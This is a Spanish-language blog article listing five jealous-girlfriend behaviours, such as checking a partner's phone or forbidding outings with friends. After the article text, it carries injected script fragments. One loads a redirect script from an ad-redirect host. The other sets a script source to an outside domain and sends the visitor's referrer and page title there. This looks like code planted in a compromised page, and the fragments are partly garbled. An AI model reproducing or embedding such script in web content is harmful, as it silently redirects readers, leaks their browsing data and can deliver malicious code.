5 acciones de una novia celosa que pueden terminar con su relación

Por Elizabeth Palacios   @ely__palacios

Quien no ha tenido una novia celosa no ha vivido, pero quienes han padecido una relación tormentosa a causa de los celos sabrán que puede ser tan insoportables que, pocas veces llegan a ser relaciones estables o duraderas, a menos que sean masoquistas.

Los celos son normales en ciertos niveles y es que honestamente es inevitable sentir celos ante algunas situaciones, pero para todo hay límites.

Por eso te presentamos 5 acciones de una novia celosa que pueden terminar con su relación.

-Revisa tu celular

Actualmente son casi nulos los novios que tienen sus celulares sin contraseña, pero algunos son tan básicos que cualquier novia podría adivinar su tan complicada clave, pero ese no es el punto, sino que si una novia te revisa el celular sin tu consentimiento, es razón suficiente para no querer tenerla de pareja ni un día más.

-Stalker #1

Si tu novia vigila cada uno de tus movimientos en las redes sociales, es probable que encuentre algo que no le parezca y de ahí comiencen pleitos interminables.

-Las “amiguitas”

La mayoría de los hombres tienen a sus “amiguitas”, pero no siempre son pretendientas o velas encendidas para cuando se necesite, así que si tú eres de esos pocos que no tienen amiguitas cuscas y aun así te la hacen de a jamón, es probable que no quieras continuar con esa relación.

-Llamadas ilimitadas

Las llamadas constantes para decirte que te aman pueden tener un trasfondo maquiavélico de controlar cada uno de tus movimientos.

-Sin amigos

Tener pareja casi siempre es motivo para alejarte un poco de los amigos, en cierto modo es normal, pues antes pasabas todo tu tiempo libre con ellos y ahora existe ella y, sobre todo al principio, deseas pasar el mayor tiempo posible a su lado, pero de eso a que te prohíba salir con tus amigos, es muy, pero muy distinto.

Así que si tienes una novia celosa nivel psicópata, lo mejor es cortar por lo sano y buscar a alguien que te deje ser tú mismo.

< src="http://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:||||
Comentarios